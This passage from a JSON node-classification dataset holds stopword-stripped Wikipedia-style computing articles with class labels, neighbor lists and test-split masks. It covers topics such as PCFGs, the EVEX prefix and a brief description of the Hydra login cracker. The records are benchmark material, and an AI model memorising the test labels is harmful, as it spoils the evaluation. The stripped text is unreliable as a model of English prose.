treatment used clinic failed moreover cases alternatives less costly regimen used clinic suggesting system could help avoid treatment failure also reduce costs cohorts peter reiss ard van sighem athena netherlands julio montaner richard harrigan bc center excellence hiv aids canada tobias rinke de wit raph hamers kim sigaloff paser-m cohort netherlands brian agan vincent marconi scott wegner us department defense wataru sugiura national institute health japan maurizio zazzi master italy rolf kaiser eugen schuelter arevir cohort köln germany adrian streinu-cercel national institute infectious diseases prof.dr matei balş bucharest romania gerardo alvarez-uria vfhcs india maria-jesus perez-elias coris spain tulio de oliveira saturn south africa clinics jose gatell elisa lazzari university hospital barcelona spain brian gazzard mark nelson anton pozniak sundhiya mandalia chelsea westminster hospital london uk colette smith royal free hospital london uk lidia ruiz bonaventura clotet fundacion irsi caixa badelona spain schlomo staszewski hospital johann wolfgang goethe-university frankfurt germany carlo torti university brescia italy h clifford lane julia metcalf catherine rehm national institutes health clinic rockville usa maria-jesus perez-elias instituto ramón cajal de investigación sanitaria madrid spain stefano vella gabrielle dettorre sapienza university rome italy andrew carr richard norris karl hesse immunology b ambulatory care service st. vincent hospital sydney nsw australia dr emanuel vlahakis taylor square private clinic darlinghurst nsw australia hugo tempelman roos barth ndlovu care group elandsdoorn south africa robin wood carl morrow dolphina cogill desmond tutu hiv centre university cape town south africa chris hoffmann aurum institute johannesburg south africa johns hopkins university boston usa luminita ene “ dr victor babes ” hospital infectious tropical diseases bucharest romania gordana dragovic university belgrade belgrade serbia ricardo diaz cecilia sucupira federal university são paulo são paulo brazil omar sued carina cesar fundación huésped buenos aires argentina juan sierra madero instituto nacional de ciencias medicas nutricion salvador zubiran mexico city mexico pachamuthu balakrishnan shanmugam saravanan yrg care chennai india clinical trials sean emery david cooper crest carlo torti genpherex john baxter gart mdr laura monno carlo torti phengen jose gatell bonventura clotet havana gaston picchio marie-pierre debethune duet 1 2 power 3 maria-jesus perez-elias realvirfen sean emery paul khabo lotty ledwaba phidisa",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 1487,
    "label": 2,
    "text": "Dotum:dotum dotum korean truetype sans-serif font latin shape similar helvetica version 5.00 font provided part windows vista windows 7 windows 8 windows server 2008",
    "neighbors": [
      2593,
      4130,
      9539,
      7973,
      8422,
      4138,
      4141,
      6797,
      3538,
      4146,
      4148,
      8374,
      9654,
      4127
    ],
    "mask": "Test"
  },
  {
    "node_id": 1488,
    "label": 9,
    "text": "Smn_theorem:smn theorem computability theory theorem also called translation lemma parameter theorem parameterization theorem basic result programming languages generally gödel numberings computable functions soare 1987 rogers 1967 first proved stephen cole kleene 1943 name comes occurrence subscript n superscript original formulation theorem see practical terms theorem says given programming language positive integers n exists particular algorithm accepts input source code program n free variables together values algorithm generates source code effectively substitutes values first free variables leaving rest variables free basic form theorem applies functions two arguments nies 2009 p. 6 given gödel numbering formula_1 recursive functions primitive recursive function two arguments following property every gödel number p partial computable function f two arguments expressions formula_2 formula_3 defined combinations natural numbers x values equal combination words following extensional equality functions holds every x generally n 0 exists primitive recursive function formula_5 1 arguments behaves follows every gödel number p partial computable function n arguments values x … x function described taken formula_7 given arities formula_8 formula_9 every turing machine formula_10 arity formula_11 possible values inputs formula_12 exists turing machine formula_13 arity formula_9 furthermore turing machine formula_16 allows formula_17 calculated formula_18 formula_19 denoted formula_20 informally formula_16 finds turing machine formula_13 result hardcoding values formula_19 formula_10 result generalizes turing complete computing model following lisp code implements lisp example evaluates",
    "neighbors": [
      10616,
      10953,
      8262,
      11014
    ],
    "mask": "Test"
  },
  {
    "node_id": 1489,
    "label": 3,
    "text": "EVEX_prefix:evex prefix evex prefix enhanced vector extension corresponding coding scheme extension 32-bit x86 ia-32 64-bit x86-64 amd64 instruction set architecture evex based confused mvex prefix used knights corner processor evex scheme 4-byte extension vex scheme supports avx-512 instruction set allows addressing new 512-bit zmm registers new 64-bit operand mask registers evex coding address 8 operand mask registers 16 general-purpose registers 32 vector registers 64-bit mode otherwise 8 general-purpose 8 vector support 4 operands like vex coding scheme evex prefix unifies existing opcode prefixes escape codes memory addressing operand length modifiers x86 instruction set following features carried vex scheme evex also extends vex additional capabilities example evex encoding scheme allows conditional vector addition form k1 modifier next destination operand encodes use opmask register k1 conditional processing updates destination z modifier encoded evex.z provides two types masking merging zeroing merging default modifier attached evex coding scheme uses code prefix consisting 4 bytes first byte always 62h derives unused opcode 32-bit bound instruction supported 64-bit mode modr/m byte specifies addressing source register mod r/m fields encode either 8 registers 24 addressing modes destination register encoded reg field base-plus-index scale-plus-index addressing require sib byte encodes 2-bit scale factor well 3-bit index 3-bit base registers certain sib encodings disp32 contains displacements need added base address evex prefix retains fields introduced vex prefix new functions existing fields several new bit fields encoding evex prefix follows following table lists allowed register addressing combinations bit 4 always zero encoding 16 general purpose registers",
    "neighbors": [
      833,
      2821,
      9095,
      5356,
      5358,
      10383,
      499
    ],
    "mask": "Test"
  },
  {
    "node_id": 1490,
    "label": 0,
    "text": "Probabilistic_context-free_grammar:probabilistic context-free grammar grammar theory model symbol strings originated work computational linguistics aiming understand structure natural languages probabilistic context free grammars pcfgs applied probabilistic modeling rna structures almost 40 years introduced computational linguistics pcfgs extend context-free grammars similar hidden markov models extend regular grammars production assigned probability probability derivation parse product probabilities productions used derivation probabilities viewed parameters model large problems convenient learn parameters via machine learning probabilistic grammar validity constrained context training dataset pcfgs application areas diverse natural language processing study structure rna molecules design programming languages designing efficient pcfgs weigh factors scalability generality issues grammar ambiguity must resolved grammar design affects results accuracy grammar parsing algorithms various time memory requirements derivation process recursive generation strings grammar parsing finding valid derivation using automaton parse tree alignment grammar sequence example parser pcfg grammars pushdown automaton algorithm parses grammar nonterminals left right stack-like manner brute-force approach efficient rna secondary structure prediction variants cocke–younger–kasami cyk algorithm provide efficient alternatives grammar parsing pushdown automata another example pcfg parser stanford statistical parser trained using treebank similar cfg probabilistic context-free grammar defined quintuple pcfgs models extend context-free grammars way hidden markov models extend regular grammars inside-outside algorithm analogue forward-backward algorithm computes total probability derivations consistent given sequence based pcfg equivalent probability pcfg generating sequence intuitively measure consistent sequence given grammar inside-outside algorithm used model parametrization estimate prior frequencies observed training sequences case rnas dynamic programming variants cyk algorithm find viterbi parse rna sequence pcfg model parse likely derivation sequence given pcfg context-free grammars represented set rules inspired attempts model natural languages rules absolute typical syntax representation known backus–naur form production rules consist terminal formula_2 non-terminal symbols blank formula_3 may also used end point production rules cfg pcfg left side one nonterminal whereas right side string terminal nonterminals pcfg nulls excluded example grammar grammar shortened using '| 'or character terminals grammar words grammar rules non-terminal symbol transformed string either terminals and/or non-terminals grammar read beginning non-terminal emission generate either formula_3 derivation ambiguous grammar may result ambiguous parsing applied homographs since word sequence one interpretation pun sentences newspaper headline iraqi head seeks arms example ambiguous parses one strategy dealing ambiguous parses originating grammarians early pāṇini add yet rules prioritize one rule takes precedence others however drawback proliferating rules often point become difficult manage another difficulty overgeneration unlicensed structures also generated probabilistic grammars circumvent problems ranking various productions frequency weights resulting likely winner-take-all interpretation usage patterns altered diachronic shifts probabilistic rules re-learned thus updating grammar assigning probability production rules makes pcfg probabilities informed observing distributions training set similar composition language modeled samples broad language probabilistic grammars probabilities estimated data typically outperform hand-crafted grammars cfgs contrasted pcfgs applicable rna structure prediction incorporate sequence-structure relationship lack scoring metrics reveal sequence structural potential weighted context-free grammar wcfg general category context-free grammar production numeric weight associated weight specific parse tree wcfg product sum rule weights tree rule weight included often rule used tree special case wcfgs pcfgs weights logarithms probabilities extended version cyk algorithm used find lightest least-weight derivation string given wcfg tree weight product rule weights wcfgs pcfgs express set probability distributions energy minimization pcfg provide ways predicting rna secondary structure comparable performance however structure prediction pcfgs scored probabilistically rather minimum free energy calculation pcfg model parameters directly derived frequencies different features observed databases rna structures rather experimental determination case energy minimization methods types various structure modeled pcfg include long range interactions pairwise structure nested structures however pseudoknots modeled pcfgs extend cfg assigning probabilities production rule maximum probability parse tree grammar implies maximum probability structure since rnas preserve structures primary sequence rna structure prediction guided combining evolutionary information comparative sequence analysis biophysical knowledge structure plausibility based probabilities also search results structural homologs using pcfg rules scored according pcfg derivations probabilities therefore building grammar model behavior base-pairs single-stranded regions starts exploring features structural multiple sequence alignment related rnas grammar generates string outside-in fashion basepair furthest extremes terminal derived first string formula_9 derived first generating distal sides moving inwards pcfg model extendibility allows constraining structure prediction incorporating expectations different features rna expectation may reflect example propensity assuming certain structure rna however incorporation much information may increase pcfg space memory complexity desirable pcfg-based model simple possible every possible string grammar generates assigned probability weight formula_11 given pcfg model formula_12 follows sum probabilities possible grammar productions formula_13 scores paired unpaired residue explain likelihood secondary structure formations production rules also allow scoring loop lengths well order base pair stacking hence possible explore range possible generations including suboptimal structures grammar accept reject structures based score thresholds rna secondary structure implementations based pcfg approaches utilized different implementation approaches exist example pfold used secondary structure prediction group related rna sequences covariance models used searching databases homologous sequences rna annotation classification rnapromo cmfinder teiser used finding stable structural motifs rnas pcfg design impacts secondary structure prediction accuracy useful structure prediction probabilistic model based pcfg maintain simplicity without much compromise prediction accuracy complex model excellent performance single sequence may scale grammar based model able resulting multiple parse trees per grammar denotes grammar ambiguity may useful revealing possible base-pair structures grammar however optimal structure one one one correspondence parse tree secondary structure two types ambiguities distinguished parse tree ambiguity structural ambiguity structural ambiguity affect thermodynamic approaches optimal structure selection always basis lowest free energy scores parse tree ambiguity concerns existence multiple parse trees per sequence ambiguity reveal possible base-paired structures sequence generating possible parse trees finding optimal one case structural ambiguity multiple parse trees describe secondary structure obscures cyk algorithm decision finding optimal structure correspondence parse tree structure unique grammar ambiguity checked conditional-inside algorithm probabilistic context free grammar consists terminal nonterminal variables feature modeled production rule assigned probability estimated training set rna structures production rules recursively applied terminal residues left starting non-terminal formula_14 produces loops rest grammar proceeds parameter formula_15 decide whether loop start stem single stranded region parameter formula_16 produces paired bases formalism simple pcfg looks like application pcfgs predicting structures multi-step process addition pcfg incorporated probabilistic models consider rna evolutionary history search homologous sequences databases evolutionary history context inclusion prior distributions rna structures structural alignment production rules pcfg facilitates good prediction accuracy summary general steps utilizing pcfgs various scenarios several algorithms dealing aspects pcfg based probabilistic models rna structure prediction exist instance inside-outside algorithm cyk algorithm inside-outside algorithm recursive dynamic programming scoring algorithm follow expectation-maximization paradigms computes total probability derivations consistent given sequence based pcfg inside part scores subtrees parse tree therefore subsequences probabilities given pcfg outside part scores probability complete parse tree full sequence cyk modifies inside-outside scoring note term 'cyk algorithm describes cyk variant inside algorithm finds optimal parse tree sequence using pcfg extends actual cyk algorithm used non-probabilistic cfgs inside algorithm calculates formula_20 probabilities formula_21 parse subtree rooted formula_22 subsequence formula_23 outside algorithm calculates formula_24 probabilities complete parse tree sequence root excluding calculation formula_23 variables refine estimation probability parameters pcfg possible reestimate pcfg algorithm finding expected number times state used derivation summing products divided probability sequence given model formula_11 also possible find expected number times production rule used expectation-maximization utilizes values cyk algorithm calculates formula_27 find probable parse tree formula_28 yields formula_29 memory time complexity general pcfg algorithms rna structure predictions formula_30 formula_31 respectively restricting pcfg may alter requirement case database searches methods covariance models cms special type pcfgs applications database searches homologs annotation rna classification cms possible build pcfg-based rna profiles related rnas represented consensus secondary structure rna analysis package infernal uses profiles inference rna alignments rfam database also uses cms classifying rnas families based structure sequence information cms designed consensus rna structure cm allows indels unlimited length alignment terminals constitute states cm transition probabilities states 1 indels considered grammars cm follows model 6 possible states state grammar includes different types secondary structure probabilities non-terminals states connected transitions ideally current node states connect insert states subsequent node states connect non-insert states order allow insertion one base insert states connect order score cm model inside-outside algorithms used cms use slightly different implementation cyk log-odds emission scores optimum parse tree formula_38 calculated emitting states formula_39 since scores function sequence length discriminative measure recover optimum parse tree probability score- formula_40 reached limiting maximum length sequence aligned calculating log-odds relative null computation time step linear database size algorithm memory complexity formula_41 kh-99 algorithm knudsen hein lays basis pfold approach predicting rna secondary structure approach parameterization requires evolutionary history information derived alignment tree addition probabilities columns mutations grammar probabilities observed training dataset structural alignment probabilities unpaired bases columns paired bases columns independent columns counting bases single base positions paired positions one obtains frequencies bases loops stems basepair occurrence formula_42 also counted occurrence formula_43 identical basepairs formula_44 counted twice pairing sequences possible ways overall mutation rates estimated order recover plausible mutations sequence identity threshold used comparison similar sequences approach uses 85 identity threshold pairing sequences first single base positions differences -except gapped columns- sequence pairs counted position two sequences different bases count difference incremented sequence unpaired bases 4 x 4 mutation rate matrix used satisfies mutation flow x reversible basepairs 16 x 16 rate distribution matrix similarly generated pcfg used predict prior probability distribution structure whereas posterior probabilities estimated inside-outside algorithm likely structure found cyk algorithm calculating column prior probabilities alignment probability estimated summing possible secondary structures column secondary structure formula_48 sequence length formula_49 scored respect alignment tree mutational model prior distribution given pcfg formula_50 phylogenetic tree calculated model maximum likelihood estimation note gaps treated unknown bases summation done dynamic programming structure grammar assigned production probabilities devised structures training dataset prior probabilities give weight predictions accuracy number times rule used depends observations training dataset particular grammar feature probabilities written parenthesis grammar formalism rule total 100 instance given prior alignment frequencies data likely structure ensemble predicted grammar computed maximizing formula_58 cyk algorithm structure highest predicted number correct predictions reported consensus structure pcfg based approaches desired scalable general enough compromising speed accuracy needs minimal possible pfold addresses limitations kh-99 algorithm respect scalability gaps speed accuracy whereas pcfgs proved powerful tools predicting rna secondary structure usage field protein sequence analysis limited indeed size amino acid alphabet variety interactions seen proteins make grammar inference much challenging consequence applications formal language theory protein analysis mainly restricted production grammars lower expressive power model simple functional patterns based local interactions since protein structures commonly display higher-order dependencies including nested crossing relationships clearly exceed capabilities cfg still development pcfgs allows expressing dependencies providing ability model wider range protein patterns one main obstacles inferring protein grammar size alphabet encode 20 different amino acids proposed address using physico-chemical properties amino acids reduce significantly number possible combinations right side symbols production rules 3 levels quantitative property utilised instead 20 amino acid types e.g small medium large van der waals volume based scheme pcfgs produced generate binding site helix-helix contact site descriptors significant feature grammars analysis rules parse trees provide biologically meaningful information",
    "neighbors": [
      10560,
      1890,
      7780,
      8262,
      3947,
      2316,
      5399,
      3608,
      4350
    ],
    "mask": "Test"
  },
  {
    "node_id": 1491,
    "label": 4,
    "text": "Hydra_(software):hydra software hydra parallized network logon cracker hydra supports many common login protocols like forms websites ftp smb pop3 imap mysql vnc ssh many others sample output debian environment",
    "neighbors": [
      6916,
      7364,
      10341,
      5612,
      7022,
      7983,
      5492,
      4373,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 1492,
    "label": 7,
    "text": "BioBIKE:biobike biobike nee biolingua cloud-based through-the-web programmable paas symbolic biocomputing bioinformatics platform aims make computational biology especially intelligent biocomputing application artificial intelligence computational biology accessible research scientists expert programmers biobike integrated symbolic biocomputing bioinformatics platform built start entirely called cloud-based architecture computing done remote servers user access accomplished web browsers biobike built-in frame system objects data knowledge represented enables code written either native lisp visual programming language systems rules expressed snark theorem prover access whole biological knowledge integrated manner time released 2002 unique permitting users create fully functional biocomputing programs run back-end servers entirely web browser ui modern terms one first paas platform service systems predating even salesforce capability initially programming carried raw lisp jeff elhai team vcu nsf funding created entirely graphical programming environment top biobike based upon boxer-style programming environments multi-headed multi-threaded multi-user multi-tenancy cloud-based system biobike users able directly work together web browsers remotely sharing listener memory space permitted unique sort collaboration discussed shrager 2007 specialized offshoot biobike called biodeducta includes sri snark theorem prover offering unique deductive biocomputing capabilities biobike open-source software implemented using lisp programming language continuing development takes place biobike team centered virginia commonwealth university biobike originally called biolingua developed jeff shrager carnegie inst washington dept plant biology jp massar funding nasa astrobiology division shrager massar wanted create web-based multi-user lisp machine specialized bioinformatics early contributors project included mike travers jeff elhai vcu elhai obtained continuing funding national science foundation project renamed biobike elhai colleagues added biobike unique visual programming language shrager meanwhile collaborated richard waldinger sri build sri snark theorem prover biobike creating deductive biocomputing system called biodeducta used number biobike verticals different biological domains including viral pathogens cyanobacteria bacteria arabidopsis thaliana several others described references",
    "neighbors": [
      4194,
      2691,
      6502,
      7983,
      5397
    ],
    "mask": "Test"
  },
  {
    "node_id": 1493,
    "label": 4,
    "text": "CCNA:ccna ccna cisco certified network associate information technology certification cisco systems ccna certification associate-level cisco career certification cisco exams changed several times response changing trends 2013 cisco announced update certification program aligns certification training curricula evolving industry job roles several different types cisco-certified network associate ccna routing switching closest original ccna focus types ccna focus security cloud collaboration security operations design data center technologies industrial plants service providers wireless content exams proprietary cisco learning partners offer variety different training methods including books published cisco press online classroom courses available title interconnecting cisco network devices achieve ccna routing switching certification one must earn passing score cisco exam 200-125 combined passing scores interconnecting cisco network devices 1 icnd1 100-105 interconnecting cisco network devices 2 icnd2 200-105 exams passing icnd1 exam grants candidate cisco certified entry networking technician ccent certification completion exam candidates receive score report along score breakout exam section passing score given exam 200-125 ccna composite exam associated cisco certified network associate routing switching certification exam tests candidate knowledge skills required install operate troubleshoot small medium size enterprise branch network topics include connecting wan implementing network security network types network media routing switching fundamentals tcp/ip osi models ip addressing wan technologies operating configuring ios devices extending switched networks vlans determining ip routes managing ip traffic access lists establishing point-to-point connections receive ccna certification one must pass either prerequisites take ccna routing switching certification exam also starting points networking licenses ccent cct ten tracks associate certifications cisco career certifications feb/2020 would updated eleven tracks including cisco certified devnet associate ccda ccna cloud ccna collaboration ccna cyber ops ccna data center ccna industrial ccna routing switching ccna security ccna service provider ccna wireless ccna routing switching validity ccna certification 3 years renewal requires certification holders register pass higher level cisco recertification exam every 3 years",
    "neighbors": [
      10307,
      357,
      8613,
      9607,
      7336,
      8462,
      6834,
      5010,
      6105,
      316,
      10717
    ],
    "mask": "Test"
  },
  {
    "node_id": 1494,
    "label": 4,
    "text": "Reflected_DOM_Injection:reflected dom injection reflected dom injection rdi evasive xss technique uses third party website construct execute attack technique implemented websites use user-provided url part service e.g translation services caching services etc order implement technique using technique exploit triggered user followed expected flow accessed website using third party service code however would execute browsing directly attacker ’ website figure 1 describes direct access website uses rdi technique exploit user ’ browser accessing website directly exploit remained encrypted content sent client machine remains benign figure 2 describes attack scenario user accesses website uses rdi technique using third party service service creates new connection attacker ’ website receives content manipulates order provide service delivers new modified content user manipulation done service turns attacker ’ page malicious one helping generate key required decrypt malicious code rdi technique actually uses third party service create malicious content rdi technique provides following benefits rdi technique first presented defcon 21 daniel chechik anat davidi full scenario technique described paper published following conference trustwave spiderlabs blog ... site reliable",
    "neighbors": [
      3473,
      3629,
      4198
    ],
    "mask": "Test"
  },
  {
    "node_id": 1495,
    "label": 4,
    "text": "Distributed_Checksum_Clearinghouse:distributed checksum clearinghouse distributed checksum clearinghouse also referred dcc hash sharing method spam email detection basic logic dcc spam mails sent many recipients message body appearing many times therefore bulk email dcc identifies bulk email taking checksum sending checksum clearinghouse server server responds number times received checksum individual email create score 1 time processed bulk mail identified response number high content examined dcc works udp protocol uses little bandwidth dcc resistant hashbusters main dcc checksums fuzzy ignore aspects messages fuzzy checksums changed spam evolves dcc likely identify mailing lists bulk email unless white listed likewise repeatedly sending email server increases number server therefore likelihood treated spam others according official dcc website dcc based idea paul vixie fuzzy body matching reject spam corporate firewall operated vernon schryver starting 1997 dcc designed written rhyolite software starting 2000 used production since winter 2000/2001",
    "neighbors": [
      1667,
      8202,
      7949,
      914,
      5012,
      11413,
      10263,
      8093,
      8224,
      10275,
      8747,
      8373,
      4294,
      3145,
      3032,
      9053,
      6762,
      1899,
      4725
    ],
    "mask": "Test"
  },
  {
    "node_id": 1496,
    "label": 4,
    "text": "Electronic_signature:electronic signature electronic signature e-signature refers data electronic form logically associated data electronic form used signatory sign type signature provides legal standing handwritten signature long adheres requirements specific regulation created e.g. eidas european union nist-dss usa zertes switzerland electronic signatures legal concept distinct digital signatures cryptographic mechanism often used implement electronic signatures electronic signature simple name entered electronic document digital signatures increasingly used e-commerce regulatory filings implement electronic signatures cryptographically protected way standardization agencies like nist etsi provide standards implementation e.g. nist-dss xades pades concept new common law jurisdictions recognized telegraph signatures far back mid-19th century faxed signatures since 1980s electronic signature intended provide secure accurate identification method signatory provide seamless transaction definitions electronic signatures vary depending applicable jurisdiction common denominator countries level advanced electronic signature requiring electronic signatures may created increasing levels security set requirements means creation various levels prove validity signature provide even stronger probative value described advanced electronic signature countries like european union switzerland introduced qualified electronic signature difficult challenge authorship statement signed qualified electronic signature statement non-repudiable technically qualified electronic signature implemented advanced electronic signature utilizes digital certificate encrypted security signature-creating device authenticated qualified trust service provider since well american civil war began 1861 morse code used send messages electrically telegraphy messages agreements terms intended enforceable contracts early acceptance enforceability telegraphic messages electronic signatures came new hampshire supreme court 1869 1980s many companies even individuals began using fax machines high-priority time-sensitive delivery documents although original signature original document paper image signature transmission electronic courts various jurisdictions decided enforceable electronic signatures include agreements made email entering personal identification number pin bank atm signing credit debit slip digital pen pad device application graphics tablet technology point sale installing software clickwrap software license agreement package signing electronic documents online first agreement signed electronically two sovereign nations joint communiqué recognizing growing importance promotion electronic commerce signed united states ireland 1998 1996 united nations published uncitral model law electronic commerce article 7 uncitral model law electronic commerce highly influential development electronic signature laws around world including us 2001 uncitral concluded work dedicated text uncitral model law electronic signatures adopted 30 jurisdictions latest uncitral text dealing electronic signatures article 9 paragraph 3 united nations convention use electronic communications international contracts 2005 establishes mechanism functional equivalence electronic handwritten signatures international level well cross-border recognition canadian law pipeda attempts clarify situation first defining generic electronic signature signature consists one letters characters numbers symbols digital form incorporated attached associated electronic document defining secure electronic signature electronic signature specific properties pipeda secure electronic signature regulations refine definition digital signature applied verified specific manner european union eu regulation 910/2014 electronic identification trust services electronic transactions european internal market eidas sets legal frame electronic signatures repeals directive 1999/93/ec current applicable version eidas published european parliament european council july 23 2014 following article 25 1 eidas regulation advanced electronic signature shall “ denied legal effect admissibility evidence legal proceedings however reach higher probative value enhanced level qualified electronic signature requiring use qualified electronic signature creation device based certificate issued qualified trust service provider upgraded advanced signature carries according article 25 2 eidas regulation legal value handwritten signature however regulated european union similarly zertes switzerland qualified electronic signature defined united states u.s. code defines electronic signature purpose us law electronic sound symbol process attached logically associated contract record executed adopted person intent sign record may electronic transmission document contains signature case facsimile transmissions may encoded message telegraphy using morse code united states definition qualifies electronic signature wide set uniform electronic transactions act ueta released national conference commissioners uniform state laws nccusl 1999 influenced aba committee white papers uniform law promulgated nccusl ueta term means electronic sound symbol process attached logically associated record executed adopted person intent sign record definition many core concepts ueta echoed u.s. esign act 2000 47 us states district columbia us virgin islands enacted ueta new york washington state illinois enacted ueta states adopted electronic signatures statute various laws passed internationally facilitate commerce use electronic records signatures interstate foreign commerce intent ensure validity legal effect contracts entered electronically instance digital signatures cryptographic implementations electronic signatures used proof authenticity data integrity non-repudiation communications conducted internet implemented compliance digital signature standards digital signing offer end-to-end privacy signing process user-friendly secure digital signatures generated verified standardized frameworks digital signature algorithm dsa nist compliance xades pades cades standards specified etsi typically three algorithms involved digital signature process process digital signing requires signature generated fixed message private key authenticated accompanied public key using cryptographic algorithms user ’ signature replicated without access private key secure channel typically required applying asymmetric cryptography methods digital signature process prevents several common attacks attacker attempts gain access following attack methods relevant standards digital signatures respect size domestic markets digital signature standard dss national institute standards technology nist eidas regulation enacted european parliament openpgp non-proprietary protocol email encryption public key cryptography supported pgp gnupg s/mime ietf standards evolved popular email encryption standard world electronic signature may also refer electronic forms processing verifying identity use biometric signatures biologically identifying qualities individual signatures use approach attaching biometric measurement hash said measurement document evidence instance fingerprints hand geometry finger lengths palm size iris patterns even retinal patterns collected using electronic sensors kind since physical characteristics claims uniqueness among humans extent useful signature biometric measurements type useless passwords ca n't changed compromised however might serviceable electronic signatures kind except date easily spoofable carry little assurance person purportedly signed document actually person unfortunately easily spoofable replay electronic signal produced submitted computer system responsible 'affixing signature document wiretapping techniques often suffice particular case fingerprints japanese professor graduate students managed spoof commercially available fingerprint readers available ordinary kitchen chemistry gummy bear candy gel little ingenuity actual fingers needed successfully spoof every reading device another example researchers vietnam successfully demonstrated late 2017 specially crafted mask could beat apple face id program iphone x",
    "neighbors": [
      2050,
      517,
      10378,
      9744,
      1297,
      8859,
      3231,
      7075,
      5674,
      4015,
      5433,
      8634,
      3264,
      6222,
      5200,
      8018,
      8283,
      8674,
      3944,
      9576,
      3574,
      9334,
      510
    ],
    "mask": "Test"
  },
  {
    "node_id": 1497,
    "label": 3,
    "text": "PDOS:pdos pdos discontinued multiuser multitasking operating system written assembly language developed early 1980s eyring research institute texas instruments tms9900 processor later ported motorola 68000 processor time speed accuracy power made ideal process control used system development education industrial uses eyring also sold application programs e.g statistics package operating system",
    "neighbors": [
      7269,
      477,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 1498,
    "label": 2,
    "text": "Active_Directory_Rights_Management_Services:active directory rights management services active directory rights management services ad rms known rights management services rms windows server 2008 server software information rights management shipped windows server uses encryption form selective functionality denial limiting access documents corporate e-mails microsoft word documents web pages operations authorized users perform companies use technology encrypt information stored document formats policies embedded documents prevent protected content decrypted except specified people groups certain environments certain conditions certain periods time specific operations like printing copying editing forwarding deleting allowed disallowed content authors individual pieces content rms administrators deploy rms templates group rights together predefined rights applied en masse rms debuted windows server 2003 client api libraries made available windows 2000 later rights management client included windows vista later available windows xp windows 2000 windows server 2003 addition implementation ad rms office mac use rights protection os x third-party products available use rights protection android blackberry os ios windows rt april 2016 alleged attack rms implementations including azure rms published reported microsoft published code allows authorized user granted right view rms protected document remove protection preserve file formatting sort manipulation requires user granted rights decrypt content able view rights management services makes certain security assertions regarding inability unauthorized users access protected content differentiation different usage rights authorized users considered part policy enforcement capabilities microsoft claims implemented best effort considered microsoft security issue policy enforcement limitation previously rms sdk enforced signing code using rms capabilities order provide level control applications interacted rms capability later removed due limited ability restrict behaviors given possibility write applications use web services directly obtain licenses decrypt content addition using technique user granted rights view protected document manipulate content document without leaving traces manipulation since azure rms non-repudiation solution unlike document signing solutions claim provide anti-tampering capabilities since changes made users granted rights document microsoft consider later issue actual attack claimed capabilities rms researchers provide proof concept tool allow evaluation results via github rms natively supported following products third-party solutions secure islands acquired microsoft gigatrust liquid machines acquired check point add rms support following",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      653,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      3303,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      782,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      11221,
      5594,
      8668,
      478,
      6114,
      6115,
      4074,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "None"
  },
  {
    "node_id": 1499,
    "label": 3,
    "text": "Application-specific_instruction_set_processor:application-specific instruction set processor application-specific instruction set processor asip component used system-on-a-chip design instruction set asip tailored benefit specific application specialization core provides tradeoff flexibility general purpose cpu performance asic asips configurable instruction set usually cores divided two parts static logic defines minimum isa instruction-set architecture configurable logic used design new instructions configurable logic programmed either field similar fashion field-programmable gate array fpga chip synthesis asips used alternative hardware accelerators baseband signal processing video coding traditional hardware accelerators applications suffer inflexibility difficult reuse hardware datapath handwritten finite-state machines fsm retargetable compilers asips help designer update program reuse datapath typically asip design less dependent tool flow designing processor scratch complicated commercial tools design asips example processor designer synopsys open source tool well tta-based co-design environment tce",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      3175,
      8815,
      630,
      8822,
      6268,
      3197,
      7313,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      8700,
      1798,
      1801,
      6926,
      6415,
      1298,
      11539,
      2339,
      6950,
      3886,
      309,
      8501,
      5948,
      4928,
      8514,
      4423,
      6476,
      7505,
      9044,
      11604,
      344,
      8543,
      1376,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      3457,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      453,
      3014,
      466,
      1502,
      7134,
      5090,
      995,
      7653,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 1500,
    "label": 4,
    "text": "Demanufacturing:demanufacturing demanufacture process product extensive usage disassembled components components classified functionality components suitable reuse returned product reuse demanufacturing proposed used industries means reduce environmental footprint preserving economic viability processes involved term first coined professor walter w. olson professor john w. sutherland 1993 case waste electronics demanufacture involves dismantling components case material demanufacture may chemical process treatment waste plastics breaking long polymers smaller polymers",
    "neighbors": [
      1477,
      11534,
      2867,
      403,
      7579
    ],
    "mask": "Test"
  },
  {
    "node_id": 1501,
    "label": 3,
